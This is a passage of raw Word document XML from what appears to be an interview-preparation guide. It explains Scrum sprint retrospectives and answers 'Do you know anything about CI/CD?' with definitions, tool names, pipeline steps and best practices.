      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Product Own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crum Mast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Development Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C792C5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crum Master typically facilitates the retrospective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5E8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enda</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE2F3B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t the stage</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a comfortable environment for open communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABE14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ather data</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collect insights on how the sprint went, using techniques like start/stop/continue, or using data from sprint metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE7D6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enerate insights</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Identify patterns or trends in what went well and what didn’t.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D577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ide what to do</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Come up with specific, actionable improvements to implement in the next sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61207C7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se</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Summarize the discussion and any action items, and end the meeting with a positive note.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3653C92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nefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758DAE6"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mprovement</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Teams continuously assess their processes and practices to identify areas for improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D27B7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helps foster better communication and teamwork among team members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6D9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Productivity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By identifying and addressing obstacles or inefficiencies, the team can become more productive in future sprints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24526FC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flection</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It encourages reflection on both the technical and non-technical aspects of the sprint, leading to a holistic improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09967F1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Techniques for Sprint Retrospective</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D960A0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rt/Stop/Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Discuss what the team should start doing, stop doing, and continue doing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C116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5 Whys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Identify the root cause of problems by asking "Why" multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A055CBC"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ad/Sad/Glad</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Express feelings about the sprint to identify areas that need attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC385D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lus/Delta</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Plus (+) for what went well and Delta (Δ) for what needs improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2785F"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utcome</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600CA99"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ctionable Improvements</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The retrospective results in actionable improvements that can be implemented in the next sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769339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Growth</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The retrospective allows the team to bond and grow by addressing any issues, leading to better collaboration and morale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EDD452"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t’s Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F70FC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helps teams avoid stagnation and fosters a culture of continuous improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38260649"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provides a structured way for the team to acknowledge and address problems or successes from the sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBFE0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fine-tune their processes, tools, and techniques over time to become more effective in delivering high-quality results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE2944"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key Agile ceremony that promotes transparency, reflection, and continuous improvement, ensuring the team consistently evolves and enhances its performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756A1F8" w14:textId="03FE8F8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3853" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="484EC777" w14:textId="000C81AF" w:rsidR="002B5B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00060638">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="952" w:name="_Toc197868166"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you know anything about CI/CD</w:t>
      </w:r>
      <w:r w:rsidR="002B5B56" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="952"/>
    </w:p>
    <w:p w14:paraId="1016AB90" w14:textId="3F5BFC07"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stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Integration</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Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Integration (CI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A97D3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I:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B8BF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Code Commits</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers commit their code changes frequently (usually multiple times a day) to a shared repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E869D4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Builds</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Whenever a developer commits code, an automated build process is triggered. This ensures the new code integrates well with the existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BF5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Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Along with the build, automated unit tests or integration tests are run to ensure that new changes don’t break existing functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A618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arly Detection of Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the code is integrated and tested frequently, issues (like broken code, failing tests, or integration conflicts) are detected early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CFE4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 Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC453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A popular open-source automation server used to automate various tasks such as building, testing, and deploying software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B87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Travis CI</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A cloud-based CI service that integrates with GitHub repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6479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rcleCI</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A modern CI/CD platform that automates the software delivery pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84E25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itLab CI</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: CI tool integrated into the GitLab platform for automating builds, testing, and deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBFAD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livery (CD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02349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D:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21514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Deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After passing through CI processes (build and test), the application is automatically deployed to staging or production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639A4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Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With CD, teams can release new features or bug fixes rapidly and with confidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7629D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ollback Capabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In case of a failed release, the system supports rollback mechanisms to revert to the previous working version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F22F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ging and Production Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The software is tested in a staging environment, which mirrors the production environment, ensuring the system works well before going live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D817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D Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693BEE3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innaker</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An open-source multi-cloud continuous delivery platform that helps in deploying software to cloud platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2DD0B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go CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Kubernetes-native continuous delivery tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC496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ctopus Deploy</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A popular deployment automation tool that works well with CI systems to automate the delivery of applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787ECB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ployment (CD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149150E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ployment (CD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes a step further than Continuous Delivery by automating the entire release process, including pushing code directly to production once it passes all testing and checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA2D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ontinuous Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BD09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ic Production Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the code passes all tests and checks, it is automatically deployed to production without human intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1CFBE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pid Feedback Loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This allows teams to release new features, improvements, or fixes almost immediately to end users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF8B3B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fidence and Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automated tests and monitoring ensure that the release will be reliable, reducing the risk of introducing bugs or errors into production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76137BC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CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480444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aster Time to Market</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With automated testing and deployment pipelines, new features and fixes are delivered quickly to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8409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tter Software Quality</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Continuous testing ensures that bugs are caught early, reducing the likelihood of defects in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4863CBA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duced Risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Smaller, more frequent releases reduce the risk of major issues. If a problem arises, it’s easier to identify and roll back changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3788D93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proved Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers, testers, and operations teams can collaborate more effectively, knowing the code is continuously integrated, tested, and delivered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18016C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Developer Productivity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By automating manual steps, developers spend more time writing code and less time on repetitive tasks like manual testing or deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A543C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 CI/CD Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425254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eloper commits code to the repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GitHub, GitLab, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40139FF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server</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Jenkins or Travis) is triggered and builds the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC56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application is </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically tested</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unit tests, integration tests, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B832D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ests pass, the code is deployed to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>staging environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69847FD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livery</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the code is then available for manual release to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29F58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ployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the code is automatically deployed to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC6D38"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6D3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 testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that all tests (unit, integration, end-to-end) are automated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB7D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feature flags</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For Continuous Deployment, feature flags allow you to deploy code to production without making it visible to users until you are ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338009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mall, incremental changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
